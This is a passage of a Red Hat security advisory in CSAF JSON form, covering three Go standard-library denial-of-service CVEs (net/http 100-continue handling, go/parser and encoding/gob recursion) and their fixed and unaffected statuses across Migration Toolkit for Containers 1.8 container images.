"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2295310"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Go. The net/http module mishandles specific server responses from HTTP/1.1 client requests. This issue may render a connection invalid and cause a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "net/http: Denial of service due to improper 100-continue handling in net/http",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "An attacker would need to control a malicious server and induce a client to connect to it, requiring some amount of preparation outside of the attacker\u0027s control. This reduces the severity score of this flaw to Moderate.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-20: Improper Input Validation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nRed Hat enforces the principle of least functionality, ensuring that only essential features, services, and ports are enabled. This minimizes the number of components that could be affected by input validation vulnerabilities. Security testing and evaluation standards are implemented within the environment to rigorously test input validation mechanisms during the development lifecycle, while static code analysis identifies potential input validation vulnerabilities by default. Process isolation ensures that processes handling potentially malicious or unvalidated inputs run in isolated environments by separating execution domains for each process. Malicious code protections, such as IPS/IDS and antimalware solutions, help detect and mitigate malicious payloads stemming from input validation vulnerabilities. Finally, robust input validation and error-handling mechanisms ensure all user inputs are thoroughly validated, preventing improperly validated inputs from causing system instability, exposing sensitive data, or escalating risks further.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-24791"
},
{
"category": "external",
"summary": "RHBZ#2295310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2295310"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-24791",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24791"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-24791",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24791"
},
{
"category": "external",
"summary": "https://go.dev/cl/591255",
"url": "https://go.dev/cl/591255"
},
{
"category": "external",
"summary": "https://go.dev/issue/67555",
"url": "https://go.dev/issue/67555"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ",
"url": "https://groups.google.com/g/golang-dev/c/t0rK-qHBqzY/m/6MMoAZkMAgAJ"
}
],
"release_date": "2024-07-02T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "net/http: Denial of service due to improper 100-continue handling in net/http"
},
{
"cve": "CVE-2024-34155",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:06.929766+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310527"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the go/parser package of the Golang standard library. Calling any Parse functions on Go source code containing deeply nested literals can cause a panic due to stack exhaustion.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-674: Uncontrolled Recursion vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nInput validation controls ensure that inputs triggering recursion are validated to stay within safe limits which reduces the risk of infinite or excessive recursion. The implementation of least functionality on the platform further restricts potential impacts of recursions by disabling unnecessary recursive functions or features, thus reducing the available pathways for a would-be attacker. The inclusion of developer testing and evaluation ensures that recursive functions are tested and that safeguards like error handling are in place. In the case of successful exploitation, detection and containment controls are in place to limit impacts by alerting on anomalous system behavior in real time while process isolation can limit impacts to a single process.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34155"
},
{
"category": "external",
"summary": "RHBZ#2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34155",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34155"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34155"
},
{
"category": "external",
"summary": "https://go.dev/cl/611238",
"url": "https://go.dev/cl/611238"
},
{
"category": "external",
"summary": "https://go.dev/issue/69138",
"url": "https://go.dev/issue/69138"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3105",
"url": "https://pkg.go.dev/vuln/GO-2024-3105"
}
],
"release_date": "2024-09-06T21:15:11.947000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion"
},
{
"cve": "CVE-2024-34156",
"cwe": {
"id": "CWE-674",
"name": "Uncontrolled Recursion"
},
"discovery_date": "2024-09-06T21:20:09.377905+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2310528"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the encoding/gob package of the Golang standard library. Calling Decoder.Decoding, a message that contains deeply nested structures, can cause a panic due to stack exhaustion. This is a follow-up to CVE-2022-30635.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in Go\u0027s `encoding/gob` package is of high severity because it exposes applications to potential Denial of Service (DoS) attacks through stack exhaustion. Since `gob` relies on recursive function calls to decode nested structures, an attacker could exploit this by sending crafted messages with excessively deep nesting, causing the application to panic due to stack overflow. This risk is particularly important in scenarios where untrusted or external input is processed, as it can lead to system unavailability or crashes, undermining the reliability and availability of services.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"known_not_affected": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-34156"
},
{
"category": "external",
"summary": "RHBZ#2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34156"
},
{
"category": "external",
"summary": "https://go.dev/cl/611239",
"url": "https://go.dev/cl/611239"
},
{
"category": "external",
"summary": "https://go.dev/issue/69139",
"url": "https://go.dev/issue/69139"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk",
"url": "https://groups.google.com/g/golang-dev/c/S9POB9NCTdk"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2024-3106",
"url": "https://pkg.go.dev/vuln/GO-2024-3106"
}
],
"release_date": "2024-09-06T21:15:12.020000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-12-10T01:37:19+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64",
"8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:10906"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
